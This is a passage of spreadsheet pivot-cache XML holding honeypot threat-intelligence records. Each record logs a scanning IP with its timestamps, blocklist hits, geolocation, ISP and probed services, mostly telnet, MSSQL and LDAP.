    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f3:6d04"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2393"/>
    <x v="2393"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T00:01:57"/>
    <d v="2025-04-09T23:56:19"/>
    <d v="2025-04-10T00:01:57"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:1a11"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2394"/>
    <x v="2394"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T23:45:40"/>
    <d v="2025-04-09T23:45:40"/>
    <d v="2025-04-09T23:45:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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3d01:8fbd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2395"/>
    <x v="2395"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T23:44:16"/>
    <d v="2025-04-09T23:44:16"/>
    <d v="2025-04-09T23:44:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_LDAP_HC1"/>
    <s v="389"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Rappahannock"/>
    <s v="Washington"/>
    <s v="4792307"/>
    <s v="22747"/>
    <s v="38.7134"/>
    <s v="-78.1591"/>
    <s v="8075"/>
    <s v="MICROSOFT-CORP-MSN-AS-BLOCK"/>
    <s v="Microsoft Corporation"/>
    <s v="corporate"/>
    <s v="Microsoft Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_LDAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:30d8:fd16"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2396"/>
    <x v="2396"/>
    <s v="ec2-18-97-5-55.compute-1.amazonaws.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-09T23:28:57"/>
    <d v="2025-01-13T22:51:21"/>
    <d v="2025-04-09T23:28:57"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_FTP_HC1"/>
    <s v="443&amp;&amp;21&amp;&amp;389&amp;&amp;6667&amp;&amp;3306&amp;&amp;NA&amp;&amp;6379"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Loudoun"/>
    <s v="Ashburn"/>
    <s v="4744870"/>
    <s v="20149"/>
    <s v="39.0438"/>
    <s v="-77.4874"/>
    <s v="14618"/>
    <s v="Amazon.com, Inc."/>
    <s v="Amazon.com, Inc."/>
    <s v="hosting"/>
    <s v="Amazon Technologies Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;command&amp;&amp;request"/>
    <s v="{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/57.0.3069.112 Safari/537.32', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'VERSION', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;NA&amp;&amp;{Data_REDIS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:1261:537"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2397"/>
    <x v="2397"/>
    <s v="azpdegt6hh6x.stretchoid.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-09T23:10:13"/>
    <d v="2025-03-29T19:51:22"/>
    <d v="2025-04-09T23:10:13"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_FTP_H31"/>
    <s v="143&amp;&amp;21&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Rappahannock"/>
    <s v="Washington"/>
    <s v="4792307"/>
    <s v="22747"/>
    <s v="38.7134"/>
    <s v="-78.1591"/>
    <s v="8075"/>
    <s v="Microsoft Corporation"/>
    <s v="Microsoft Corporation"/>
    <s v="business"/>
    <s v="Microsoft Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:30d8:f9e1"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2398"/>
    <x v="2398"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T22:38:39"/>
    <d v="2025-04-09T20:37:15"/>
    <d v="2025-04-09T22:38:39"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:f114"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2399"/>
    <x v="2399"/>
    <s v="NA&amp;&amp;1-169-171-207.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-09T22:32:17"/>
    <d v="2025-04-08T05:04:07"/>
    <d v="2025-04-09T22:32:17"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2010-05-05"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET: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1a9:abcf"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2400"/>
    <x v="2400"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T22:15:01"/>
    <d v="2025-04-09T22:15:01"/>
    <d v="2025-04-09T22:15:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:3480"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2401"/>
    <x v="2401"/>
    <s v="NA&amp;&amp;123-193-145-57.dynamic.kbronet.com.tw"/>
    <x v="0"/>
    <d v="2025-04-09T22:07:48"/>
    <d v="2024-09-09T12:22:00"/>
    <d v="2025-04-09T22:07:48"/>
    <n v="458"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;18093&amp;&amp;23&amp;&amp;60647&amp;&amp;52800&amp;&amp;52845&amp;&amp;52870&amp;&amp;80&amp;&amp;NA&amp;&amp;60991"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0797"/>
    <s v="121.571"/>
    <s v="38841"/>
    <s v="kbro CO. Ltd."/>
    <s v="kbro CO. Ltd."/>
    <s v="business"/>
    <s v="TUNGHO"/>
    <s v="2006-12-22"/>
    <s v="KBRO-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7bc1:9139"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2402"/>
    <x v="2402"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T22:02:28"/>
    <d v="2025-04-09T22:02:28"/>
    <d v="2025-04-09T22:02:28"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:b3b8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2403"/>
    <x v="2403"/>
    <s v="014198196220.ctinets.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-09T21:34:47"/>
    <d v="2025-04-07T02:39:36"/>
    <d v="2025-04-09T21:34:47"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3702"/>
    <s v="114.13"/>
    <s v="9269"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="residential"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="2010-09-06"/>
    <s v="HKBN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1998-06-01 04:00:00"/>
    <s v="2027-05-31 04:00:00"/>
    <s v="2022-04-28 06:31:12"/>
    <s v="['NS1O.CTIHK.COM', 'NS2O.CTIHK.COM']"/>
    <s v="Network Solutions, LLC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="22"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:ec6:c4dc"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2404"/>
    <x v="2404"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T21:25:05"/>
    <d v="2025-04-09T21:25:05"/>
    <d v="2025-04-09T21:25:05"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Nagpur"/>
    <s v="Nagpur"/>
    <s v="1262180"/>
    <s v="NA"/>
    <s v="21.1463"/>
    <s v="79.0849"/>
    <s v="55341"/>
    <s v="ORANGEINFOCOM-IN-IN"/>
    <s v="Fribzi Multi Technologies Pvt. Ltd."/>
    <s v="corporate"/>
    <s v="Fribzi Multi Technologies Pvt. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d74:95f7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2405"/>
    <x v="2405"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T21:20:41"/>
    <d v="2025-04-09T21:20:41"/>
    <d v="2025-04-09T21:20:41"/>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dd:cedb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2406"/>
    <x v="2406"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T21:06:51"/>
    <d v="2025-04-09T21:06:51"/>
    <d v="2025-04-09T21:06:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fd:8d6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2407"/>
    <x v="2407"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T20:57:39"/>
    <d v="2024-06-12T15:36:00"/>
    <d v="2025-04-09T20:57:39"/>
    <n v="243"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;445&amp;&amp;389&amp;&amp;64131&amp;&amp;57203&amp;&amp;55719&amp;&amp;53493&amp;&amp;53469&amp;&amp;53546&amp;&amp;53511&amp;&amp;53528&amp;&amp;53558&amp;&amp;49771&amp;&amp;50037&amp;&amp;50052&amp;&amp;50088&amp;&amp;49979&amp;&amp;50114&amp;&amp;50076&amp;&amp;50007&amp;&amp;50240&amp;&amp;50133&amp;&amp;50171&amp;&amp;50345&amp;&amp;56653&amp;&amp;56724&amp;&amp;56697&amp;&amp;56763&amp;&amp;56749&amp;&amp;56771&amp;&amp;59525&amp;&amp;59535&amp;&amp;59610&amp;&amp;59636&amp;&amp;59589&amp;&amp;59663&amp;&amp;59744&amp;&amp;59774&amp;&amp;59768&amp;&amp;59800&amp;&amp;59717&amp;&amp;59750&amp;&amp;59817&amp;&amp;59855&amp;&amp;59880&amp;&amp;51628&amp;&amp;51654&amp;&amp;51643&amp;&amp;51693"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MP"/>
    <s v="Madhya Pradesh"/>
    <s v="Indore"/>
    <s v="Indore (Race Course Road)"/>
    <s v="1269743"/>
    <s v="452001"/>
    <s v="22.723"/>
    <s v="75.882"/>
    <s v="59165"/>
    <s v="Auspice Infratel Pvt. Ltd."/>
    <s v="RB5"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2015-12-07"/>
    <s v="AUSPICE"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67cc:347b"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2408"/>
    <x v="2408"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T20:56:23"/>
    <d v="2025-04-09T20:56:23"/>
    <d v="2025-04-09T20:56:23"/>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3b5c:af31"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2409"/>
    <x v="2409"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T20:52:30"/>
    <d v="2024-03-27T16:21:09"/>
    <d v="2025-04-09T20:52:30"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="40685&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2000-01-11"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
